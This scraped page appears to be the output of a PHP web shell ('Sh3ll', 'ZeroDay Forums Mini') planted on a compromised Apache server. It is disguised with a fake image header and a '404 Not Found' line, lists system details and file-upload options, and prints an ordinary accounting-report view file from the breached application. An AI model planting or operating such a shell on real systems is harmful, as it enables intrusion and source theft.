����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/adimi/application/modules/dashboard/views/accounts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/adimi/application/modules/dashboard/views/accounts/closing_report.php
<?php defined('BASEPATH') OR exit('No direct script access allowed');?>
<!-- Closing Report Start -->
<div class="content-wrapper">
	<section class="content-header">
	    <div class="header-icon">
	        <i class="pe-7s-note2"></i>
	    </div>
	    <div class="header-title">
	        <h1><?php echo display('closing_report') ?></h1>
	        <small><?php echo display('account_closing_report') ?></small>
	        <ol class="breadcrumb">
	            <li><a href="#"><i class="pe-7s-home"></i> <?php echo display('home') ?></a></li>
	            <li><a href="#"><?php echo display('accounts') ?></a></li>
	            <li class="active"><?php echo display('closing_report') ?></li>
	        </ol>
	    </div>
	</section>

	<section class="content">
		<!-- Alert Message -->
	    <?php
	        $message = $this->session->userdata('message');
	        if (isset($message)) {
	    ?>
	    <div class="alert alert-info alert-dismissable">
	        <button type="button" class="close" data-dismiss="alert" aria-hidden="true">×</button>
	        <?php echo $message ?>                    
	    </div>
	    <?php 
	        $this->session->unset_userdata('message');
	        }
	        $error_message = $this->session->userdata('error_message');
	        if (isset($error_message)) {
	    ?>
	    <div class="alert alert-danger alert-dismissable">
	        <button type="button" class="close" data-dismiss="alert" aria-hidden="true">×</button>
	        <?php echo $error_message ?>                    
	    </div>
	    <?php 
	        $this->session->unset_userdata('error_message');
	        }
	    ?>
	    <div class="row">
            <div class="col-sm-12">
                <div class="column">
                  	<?php if($this->permission->check_label('closing')->read()->access()){ ?>
                  		<a href="<?php echo base_url('dashboard/Caccounts/closing')?>" class="btn btn-success color4 m-b-5 m-r-2"><i class="ti-align-justify"> </i> <?php echo display('closing')?></a>
                  	<?php } ?>
                </div>
            </div>
        </div>

		<div class="row">
			<div class="col-sm-12">
		        <div class="panel panel-default">
		            <div class="panel-body"> 
	                	<?php echo form_open('dashboard/Caccounts/date_wise_closing_reports',array('class' => 'form-inline', ))?>
	                		<?php $today = date('m-d-Y'); ?>
							<label class="select"><?php echo display('search_by_date') ?>: <?php echo display('from') ?></label>
							<input type="text" name="from_date"  value="<?php echo html_escape($today); ?>" class="datepicker form-control"/>
							<label class="select"><?php echo display('to') ?></label>
								<input type="text" name="to_date" value="<?php echo html_escape($today); ?>" class="datepicker form-control"/>
							<button type="submit" class="btn btn-success color4"><?php echo display('search') ?></button>
						<?php echo form_close()?>		            
		            </div>
		        </div>
		    </div>
	    </div>

		<!-- Closing report -->
		<div class="row">
		    <div class="col-sm-12">
		        <div class="panel panel-bd lobidrag">
		            <div class="panel-heading">
		                <div class="panel-title">
		                    <h4><?php echo display('closing_report') ?> </h4>
		                </div>
		            </div>
		            <div class="panel-body">
		                <div class="table-responsive">
		                    <table id="dataTableExample2" class="table table-bordered table-striped table-hover">
			           			<thead>
									<tr>
										<th><?php echo display('sl') ?></th>
										<th><?php echo display('date') ?></th>
										<th><?php echo display('last_day_ammount') ?></th>
										<th><?php echo display('cash_in') ?></th>
										<th><?php echo display('cash_out') ?></th>
										<th><?php echo display('cash_in_hand') ?></th>
										<th><?php echo display('adjustment') ?></th>
									</tr>
								</thead>
								<tbody>
								<?php
									if ($daily_closing_data) {
								?>
								{daily_closing_data}
									<tr>
										<td>{sl}</td>
										<td>{final_date}</td>
										<td><?php echo ((html_escape($position)==0)?"$currency {last_day_closing}":"{last_day_closing} $currency") ?></td>
										<td><?php echo ((html_escape($position)==0)?"$currency {cash_in}":"{cash_in} $currency") ?></td>
										<td><?php echo ((html_escape($position)==0)?"$currency {cash_out}":"{cash_out} $currency") ?></td>
										<td><?php echo ((html_escape($position)==0)?"$currency {cash_in_hand}":"{cash_in_hand} $currency") ?></td>
										<td><?php echo ((html_escape($position)==0)?"$currency {adjustment}":"{adjustment} $currency") ?></td>
									</tr>
								{/daily_closing_data}
								<?php
									}
								?>
								</tbody>
		                    </table>
		                </div>
		            </div>
		        </div>
		    </div>
		</div>
	</section>
</div>
<!-- Closing Report End -->

ZeroDay Forums Mini